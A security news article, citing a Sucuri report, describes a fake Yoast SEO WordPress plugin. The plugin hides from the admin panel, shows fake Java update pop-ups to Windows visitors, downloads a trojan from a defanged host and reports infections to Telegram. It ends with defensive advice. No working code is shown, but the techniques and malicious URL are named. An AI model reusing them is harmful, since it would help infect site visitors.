A new wave of cyberattacks has been discovered targeting WordPress websites through a cleverly disguised malicious plugin.
Security analysts recently investigated persistent fake “Java Update” pop-ups on a client’s WordPress site, ultimately tracing the source to a rogue plugin masquerading as the legitimate “Yoast SEO” tool.
Hidden in the /wp-content/plugins/contact-form/ directory, the plugin incorporated falsified metadata to evade suspicion, while its true functionality was designed to deceive and infect site visitors.
Attackers Cloak Malware as Yoast SEO
The attack vector leverages an inline JavaScript payload injected into the <head> of every page for non-admin users, mimicking a legitimate Java update modal.
Beyond the convincing visuals and localized prompts, the pop-up’s underlying code creates a hidden form that silently collects user-interaction data and initiates the download of a malicious .exe file from an external, suspicious domain.
The infection targets users browsing on Windows platforms intentionally bypassing mobile, macOS, and Safari browsers to maximize the success rate of the deployed executable.
A critical feature of the plugin is its advanced obfuscation tactic: upon activation, it removes itself from the standard list of plugins in the WordPress admin panel.
This evasion significantly hampers detection and removal efforts by site administrators, allowing the plugin to persist undetected for extended periods.
Upon a user being lured into believing the authenticity of the update prompt and initiating the download, the plugin executes the startUpdate() function.
According to Sucuri Report, this method creates a realistic update progress bar while, in the background, submitting a request to download the malicious file from hxxps://2sopot[.]pl/dw4.php.
Once the executable is downloaded, further JavaScript components continue to monitor the user’s system.
By leveraging commands such as tasklist /FO CSV on Windows, the malware checks for the execution of the downloaded payload or any processes with suspicious prefixes, such as those linked to widely abused remote access tools.
If a match is detected, notifications are immediately dispatched to an attacker-controlled Telegram channel, providing real-time updates on successful infections.
Persistent Infection
The infection is further strengthened by session and cookie tracking. The plugin sets a session variable and a persistent cookie upon a download event, ensuring that the fake update prompt does not repeatedly target the same user.
This reduces the likelihood of user suspicion and helps preserve the stealth of the operation.
Technical analysis also reveals that the malware exfiltrates browser and system data, compounding the risks for victims.
Not only are compromised users at risk of credential theft, remote control, and eventual enrolment in botnets, but the site owners themselves face reputational harm, blacklisting by search engines, traffic losses, and increased clean-up costs.
The impact is not negligible: at least 13 websites were confirmed infected at the time of reporting, with the malicious executable flagged as a trojan or hacktool by 13 vendors on VirusTotal.
To defend against such sophisticated cyber threats, organizations are urgently advised to maintain rigorous update cycles for all WordPress components, rely solely on plugins and themes from verified sources, enforce strong password policies and two-factor authentication, deploy Web Application Firewalls (WAF), conduct regular malware scans, and keep redundant, secure backups.
The emergence of this fake Java update campaign underscores the increasing sophistication of contemporary cyberattacks.
By combining admin cloaking, social engineering, and real-time exfiltration, attackers continue to refine their Tactics, Techniques, and Procedures (TTPs), posing ever-greater challenges to both end-users and website administrators.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
